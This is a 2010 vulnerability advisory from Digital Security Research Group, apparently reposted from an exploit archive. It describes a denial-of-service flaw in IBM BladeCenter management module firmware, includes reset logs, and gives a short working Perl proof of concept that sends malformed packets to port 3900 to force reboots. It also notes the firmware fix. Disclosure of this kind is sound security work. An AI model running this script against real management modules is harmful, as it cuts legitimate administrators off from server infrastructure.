IBM BladeCenter Management Module - DoS vulnerability
Posted on 15 April 2010
===================================================== IBM BladeCenter Management Module - DoS vulnerability ===================================================== [DSECRG-09-049] IBM BladeCenter Management Module - DoS vulnerability Source: http://www.dsecrg.com/pages/vul/show.php?id=149 This device can be remotely rebooted by sending a malformed TCP packets Digital Security Research Group [DSecRG] Advisory #DSECRG-09-049 Application: IBM BladeCenter Managmet Module Versions Affected: before BPET50G Vendor URL: http://www-03.ibm.com/systems/bladecenter/ Bug: DoS Exploits: YES Reported: 24.07.2009 Vendor response: 26.07.2009 Date of Public Advisory: 15.04.2010 Solution: YES Author: Alexey Sintsov of Digital Security Research Group [DSecRG] Description *********** The BladeCenter management module is a hot-swappable hardware device plugged into the BladeCenter chassis management bay. The management module functions as a system-management processor (service processor) and keyboard, video, and mouse (KVM) multiplexor for blade servers. This device can be remotely rebooted. Details ******* Attacker can reset management module by sending about five or ten malformed packets on remote presence port (3900/tcp). All legal users, who use management module and management network will be disconnected. Network log: Jul 6 16:16:48 212.X.X.X NOTICE mgmt: Port MGT1 DISABLED and MGT2 ENABLED because Management Module 2 is active Jul 6 16:16:49 212.X.X.X ALERT system: link down on port MGT1 Jul 6 16:16:51 212.X.X.X NOTICE system: link up on port MGT2 Jul 6 16:17:18 212.X.X.X NOTICE mgmt: Management via all ports is DISABLED thru I2C Control Register Jul 6 16:17:20 212.X.X.X NOTICE mgmt: New Management IP Address 192.168.Y.Z configured Jul 6 16:17:23 212.X.X.X NOTICE mgmt: Management via all ports is ENABLED thru I2C Control Register BladeCenter log: 9 I SERVPROC 07/06/09, 16:17:19 (SN#YK31337BR11L) Management Module in bay 1 is standby. 10 I SERVPROC 07/06/09, 16:16:54 (SN#YK31337BR11L) Management module network initialization complete 11 I SERVPROC 07/06/09, 16:16:51 (SN#YK31337BR11L) ENET Hostname=BladeMM, IP=192.168.Y.Y, GW=0.0.0.0, Mask=255.255.255.0. 12 I SERVPROC 07/06/09, 16:16:50 (SN#YK31337BR11L) Management Module in bay 2 is primary. 13 E SERVPROC 07/06/09, 16:16:45 AMM reset due to watchdog timeout Proof of Concept: ******************* #!/usr/bin/perl # # BladeCenter AMM DoS # by Alexey Sintsov # Digital Security Research Group # # [http://dsecrg.com] # use Socket; $target='192.168.50.61'; for ($i=1;$i<=20;$i++) { socket(SERVER, AF_INET, SOCK_STREAM, getprotobyname('tcp')); $trash="xf1"x17; $target_ = inet_aton($target); $paddr=sockaddr_in(3900,$target_); sleep(2); if (connect(SERVER, $paddr)) { recv(SERVER,$buf,20,0); send(SERVER,$trash,1); close(SERVER); print "$i - fire! "; } else { print "$i - refused! "; } } print " Done "; Solution ******** The issue has been fixed in AMM firmware version bpet50g and later. # Inj3ct0r.com [2010-04-15]
